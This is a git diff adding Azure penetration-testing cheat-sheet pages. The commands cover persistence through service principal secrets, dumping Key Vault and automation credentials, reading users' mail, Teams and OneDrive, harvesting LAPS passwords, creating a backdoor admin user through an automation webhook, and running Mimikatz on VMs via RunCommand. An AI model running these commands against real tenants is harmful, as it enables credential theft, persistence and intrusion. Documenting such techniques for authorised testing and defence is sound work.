Azure Services

docs/cloud/azure/azure-persistence.md

@@ -1,6 +1,6 @@
 # Azure Persistence
 
-## Add secrets to application
+## Add Secrets to Application
 
 * Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1)
     ```powershell
@@ -15,7 +15,24 @@
     PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
     ```
 
+## Add Service Principal
+
+* Generate a new service principal password/secret
+    ```ps1
+    Import-Module Microsoft.Graph.Applications
+    Connect-MgGraph 
+    $servicePrincipalId = "<service-principal-id>"
+
+    $params = @{
+        passwordCredential = @{
+            displayName = "NewCreds"
+        }
+    }
+    Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
+    ```
+
 
 ## References
 
-* [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
+* [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
+* [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)

docs/cloud/azure/azure-services-application-endpoint.md

@@ -0,0 +1,14 @@
+# Azure Services - Application Endpoint
+
+## Enumerate
+
+* Enumerate possible endpoints for applications starting/ending with PREFIX
+    ```powershell
+    PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls}
+    PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage
+    ```
+
+
+## References
+
+* []()

docs/cloud/azure/azure-services-application-proxy.md

@@ -0,0 +1,17 @@
+# Azure Services - Application Proxy
+
+## Enumerate
+
+* Enumerate applications that have Proxy
+    ```powershell
+    PS C:\Tools> Get-AzureADApplication -All $true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
+    PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"}
+
+    PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1
+    PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId <OBJECT-ID>
+    ```
+
+
+## References
+
+* []()

docs/cloud/azure/azure-services-deployment-template.md

@@ -0,0 +1,20 @@
+# Azure Services - Deployment Template
+
+* List the deployments
+    ```powershell
+    PS Az> Get-AzResourceGroup
+    PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP
+    ```
+* Export the deployment template
+    ```ps1
+    PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <RESOURCE GROUP> -DeploymentName <DEPLOYMENT NAME>
+    
+    # search for hardcoded password
+    cat <DEPLOYMENT NAME>.json 
+    cat <PATH TO .json FILE> | Select-String password
+    ```
+
+
+## References
+
+* []()

docs/cloud/azure/azure-services-devops.md

@@ -70,7 +70,7 @@ You can access an organization's Azure DevOps Services instance via https://dev.
   $'https://dev.azure.com/YOURORGANIZATION/_apis/graph/groups?api-version=7.0'
   ```
 
-* Enumerate porject permissions: `ADOKit.exe getpermissions /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /project:"project name"`
+* Enumerate project permissions: `ADOKit.exe getpermissions /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /project:"project name"`
 
 
 ## Privilege Escalation

docs/cloud/azure/azure-services-keyvault.md

@@ -0,0 +1,37 @@
+# Azure Services - KeyVault
+
+## Access Token
+
+* Keyvault access token
+    ```powershell
+    curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
+    curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
+    ```
+
+* Connect with the access token
+    ```ps1
+    PS> $token = 'eyJ0..'
+    PS> $keyvaulttoken = 'eyJ0..'
+    PS> $accid = '2e...bc'
+    PS Az> Connect-AzAccount -AccessToken $token -AccountId $accid -KeyVaultAccessToken $keyvaulttoken
+    ```
+
+## Query Secrets 
+
+* Query the vault and the secrets
+    ```ps1
+    PS Az> Get-AzKeyVault
+    PS Az> Get-AzKeyVaultSecret -VaultName <VaultName>
+    PS Az> Get-AzKeyVaultSecret -VaultName <VaultName> -Name Reader -AsPlainText
+    ```
+
+* Extract secrets from Automations, AppServices and KeyVaults
+    ```powershell
+    Import-Module Microburst.psm1
+    PS Microburst> Get-AzurePasswords
+    PS Microburst> Get-AzurePasswords -Verbose | Out-GridView
+    ```
+
+## References
+
+* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/)

docs/cloud/azure/azure-services-microsoft-intune.md

@@ -0,0 +1,36 @@
+# Azure Services - Microsoft Intune
+
+## LAPS
+
+```ps1
+#requires -modules Microsoft.Graph.Authentication
+#requires -modules Microsoft.Graph.Intune
+#requires -modules LAPS
+#requires -modules ImportExcel
+
+$DaysBack = 30
+Connect-MgGraph
+Get-IntuneManagedDevice -Filter "Platform eq 'Windows'" |
+    Foreach-Object {Get-LapsAADPassword -DevicesIds $_.DisplayName} |
+        Where-Object {$_.PasswordExpirationTime -lt (Get-Date).AddDays(-$DaysBack)} |
+            Export-Excel -Path "c:\temp\lapsdata.xlsx" - ClearSheet -AutoSize -Show
+```
+
+
+## Intunes Administration
+
+Requirements:
+* **Global Administrator** or **Intune Administrator** Privilege : `Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"`
+
+1. Login into https://endpoint.microsoft.com/#home or use Pass-The-PRT
+2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune
+3. Go to **Scripts** and click on **Add** for Windows 10. 
+4. Add a **Powershell script**
+5. Specify **Add all users** and **Add all devices** in the **Assignments** page.
+
+:warning: It will take up to one hour before you script is executed !
+
+
+## References
+
+* [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview)

docs/cloud/azure/azure-services-office-365.md

@@ -0,0 +1,33 @@
+# Azure Services - Office 365
+
+## Microsoft Teams Messages
+
+```ps1
+TokenTacticsV2> RefreshTo-MSTeamsToken -domain domain.local
+AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | Format-Table id,content,deletiontime,*type*,DisplayName
+```
+
+
+## Outlook Mails
+
+* Read user mails
+    ```ps1
+    Get-MgUserMessage -UserId <user-id> | ft
+    Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
+    ```
+
+
+## OneDrive Files
+
+```ps1
+$userId = "<user-id>"
+Import-Module Microsoft.Graph.Files
+Get-MgUserDefaultDrive -UserId $userId
+Get-MgUserDrive -UserId $UserId  -Debug
+Get-MgDrive -top 1
+```
+
+
+## References
+
+* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps)

docs/cloud/azure/azure-services-runbook.md

@@ -0,0 +1,44 @@
+# Azure Services - Runbook
+
+Runbook must be **SAVED** and **PUBLISHED** before running it.
+
+## Create a Runbook
+
+* Check user right for automation
+    ```powershell
+    az extension add --upgrade -n automation
+    az automation account list # if it doesn't return anything the user is not a part of an Automation group
+    az ad signed-in-user list-owned-objects
+    ```
+* Add the user to the "Automation" group: `Add-AzureADGroupMember -ObjectId <OBJID> -RefObjectId <REFOBJID> -Verbose`
+* Get the role of a user on the Automation account: `Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>`. NOTE: Contributor or higher privileges accounts can create and execute Runbooks
+* List hybrid workers: `Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>`
+* Create a Powershell Runbook: `Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose`
+* Publish the Runbook: `Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose`
+* Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose`
+
+
+## Persistence via Automation accounts
+
+* Create a new Automation Account
+    * "Create Azure Run As account": Yes
+* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
+    * Sample runbook https://github.com/NetSPI/MicroBurst
+    * Publish the runbook
+    * Add a webhook to the runbook
+* Add the AzureAD module to the Automation account
+    * Update the Azure Automation Modules
+* Assign "User Administrator" and "Subscription Owner" rights to the automation account
+* Trigger the webhook with a post request to create the new user
+
+    ```powershell
+    $uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
+    $AccountInfo  = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}})
+    $body = ConvertTo-Json -InputObject $AccountInfo
+    $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
+    ```
+
+
+## References
+
+* []()

docs/cloud/azure/azure-services-storage-blob.md

@@ -0,0 +1,39 @@
+# Azure Services - Storage Blob
+
+* Blobs - `*.blob.core.windows.net`
+* File Services - `*.file.core.windows.net`
+* Data Tables - `*.table.core.windows.net`
+* Queues - `*.queue.core.windows.net`
+
+## Enumerate blobs
+
+```powershell
+PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
+PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
+Found Storage Account -  redacted.blob.core.windows.net
+```
+
+## List and download blobs
+
+```powershell
+PS Az> Get-AzResource
+PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
+PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
+PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
+```
+
+## SAS URL
+
+* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
+* Click on **Open Connect Dialog** in the left menu. 
+* Select **Blob container**. 
+* On the **Select Authentication Method** page
+    * Select **Shared access signature (SAS)** and click on Next
+    * Copy the URL in **Blob container SAS URL** field.
+
+:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
+
+
+## References
+
+* []()

docs/cloud/azure/azure-services-virtual-machine.md

@@ -0,0 +1,48 @@
+# Azure Services - Virtual Machine
+
+## RunCommand
+
+> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System`
+
+**Requirements**: `Microsoft.Compute/virtualMachines/runCommand/action`
+
+* List available Virtual Machines
+    ```powershell
+    PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
+    ResourceGroupName    Name       
+    -----------------    ----       
+    TESTRESOURCES        Remote-Test
+    ```
+
+* Get Public IP of VM by querying the network interface
+    ```powershell
+    PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
+    PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
+    PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
+    ```
+
+* Execute Powershell script on the VM, like `adduser`
+    ```ps1
+    PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
+    PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
+    ```
+
+* Finally you should be able to connect via WinRM
+    ```ps1
+    $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
+    $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
+    $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
+    Enter-PSSession $sess
+    ```
+
+Against the whole subscription using `MicroBurst.ps1`
+
+```powershell
+Import-module MicroBurst.psm1
+Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
+```
+
+
+## References
+
+* [Running Powershell scripts on Azure VM - Karl Fosaaen - November 6, 2018](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)

docs/cloud/azure/azure-services-web-apps.md

@@ -0,0 +1,13 @@
+# Azure Services - Web Apps
+
+
+## SSH Connection
+
+```powershell
+az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
+```
+
+
+## References
+
+* []()